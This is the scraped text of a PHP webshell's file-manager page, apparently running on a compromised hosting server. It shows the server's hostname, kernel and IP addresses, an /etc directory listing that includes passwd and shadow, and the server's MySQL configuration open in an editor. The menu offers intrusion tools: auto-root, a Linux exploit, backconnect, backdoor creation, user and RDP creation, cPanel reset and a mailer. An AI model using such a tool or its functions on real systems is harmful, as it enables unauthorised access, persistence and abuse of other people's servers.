Linux p3plzcpnl507038.prod.phx3.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
Apache
: 107.180.60.7 | : 216.73.217.35
Cant Read [ /etc/named.conf ]
8.2.33
xq1lly2rxbs0
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
[ DIR ]
drwxr-xr-x
apache2
[ DIR ]
drwxr-xr-x
bash_completion.d
[ DIR ]
drwxr-xr-x
cl.nodejs
[ DIR ]
drwxr-xr-x
cl.php.d
[ DIR ]
drwxr-xr-x
cl.python
[ DIR ]
drwxr-xr-x
cl.selector
[ DIR ]
drwxr-xr-x
cl.selector.conf.d
[ DIR ]
drwxr-xr-x
cpanel
[ DIR ]
drwxr-x--x
crypto-policies
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
environment-modules
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
gcrypt
[ DIR ]
drwxr-xr-x
imunify360
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
modulefiles
[ DIR ]
drwxr-xr-x
motd.d
[ DIR ]
drwxr-xr-x
my.cnf.d
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
pki
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
sasl2
[ DIR ]
drwxr-xr-x
scl
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
sysconfig
[ DIR ]
drwxr-xr-x
.etc.version
6
B
-rw-------
DIR_COLORS
4.43
KB
-rw-r--r--
aliases
1.49
KB
-rw-r--r--
at.deny
1
B
-rw-r--r--
backupmxhosts
0
B
-rw-r-----
bashrc
3.63
KB
-rw-r--r--
domainusers
6.3
KB
-rw-r-----
environment
0
B
-rw-r--r--
group
545
B
-rw-r--r--
host.conf
9
B
-rw-r--r--
hosts
294
B
-rw-r--r--
inputrc
942
B
-rw-r--r--
ld.so.cache
34.62
KB
-rw-r--r--
ld.so.conf
28
B
-rw-r--r--
lftp.conf
3.18
KB
-rw-r--r--
localtime
369
B
-rw-r--r--
lynx-site.cfg
66
B
-rw-r--r--
lynx.cfg
158.66
KB
-rw-r--r--
lynx.lss
3.5
KB
-rw-r--r--
mail.rc
1.92
KB
-rw-r--r--
mailcap
272
B
-rw-r--r--
mailhelo
45
B
-rw-r-----
mailips
0
B
-rw-r-----
man_db.conf
5.04
KB
-rw-r--r--
mime.types
58.94
KB
-rw-r--r--
my.cnf
2.11
KB
-rw-r--r--
nsswitch.conf
2.07
KB
-rw-r--r--
passwd
1.28
KB
-rw-r--r--
profile
2.86
KB
-rw-r--r--
protocols
6.41
KB
-rw-r--r--
resolv.conf
89
B
-rw-r--r--
rpc
1.6
KB
-rw-r--r--
screenrc
6.56
KB
-rw-r--r--
senderverifybypasshosts
0
B
-rw-r-----
services
676.03
KB
-rw-r--r--
shadow
841
B
-rw-------
skipsmtpcheckhosts
0
B
-rw-r-----
spammeripblocks
0
B
-rw-r-----
trusted-key.key
375
B
-rw-r--r--
trustedmailhosts
340
B
-rw-r-----
vimrc
1.94
KB
-rw-r--r--
virc
1.18
KB
-rw-r--r--
wgetrc
4.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : my.cnf
# Details on all these settings can be found at: # https://godaddy-corp.atlassian.net/wiki/spaces/HOSTING/pages/114460474/MySQL+Configuration [mysqld] # Common Settings user = mysql datadir = /var/lib/mysql tmpdir = /tmp/mysqltmp/:/var/mysqltmp/ performance_schema = OFF log_warnings = 0 myisam-recover-options = FORCE max_allowed_packet = 268435456 max_connections = 250 max_user_connections = 30 open_files_limit = 65535 thread_cache_size = 100 log_error = /var/lib/mysql/p3plzcpnl507038.prod.phx3.secureserver.net.err # Timeouts connect_timeout = 60 interactive_timeout = 60 wait_timeout = 60 # InnoDB Settings innodb_buffer_pool_size = 8192M innodb_flush_method = O_DIRECT innodb_log_buffer_size = 16M innodb_log_file_size = 1024M innodb_file_per_table = 1 transaction_isolation = READ-COMMITTED # Memory Settings key_buffer_size = 512M read_buffer_size = 2M read_rnd_buffer_size = 4M sort_buffer_size = 4M join_buffer_size = 4M myisam_sort_buffer_size = 128M tmp_table_size = 128M max_heap_table_size = 128M table_open_cache = 5000 table_definition_cache = 2000 # Query Cache query_cache_type = 1 query_cache_size = 100M query_cache_limit = 256k [mysqld-5.7] sql_mode = "NO_ENGINE_SUBSTITUTION" [mariadb] sql_mode = "NO_ENGINE_SUBSTITUTION" [mysqldump] max_allowed_packet = 1024M quick [mysql] disable-auto-rehash prompt=\d>\_ [myisamchk] key_buffer_size = 512M read_buffer_size = 32M sort_buffer_size = 512M write_buffer_size = 32M [mysqlhotcopy] interactive-timeout !include /root/.my.cnf
Close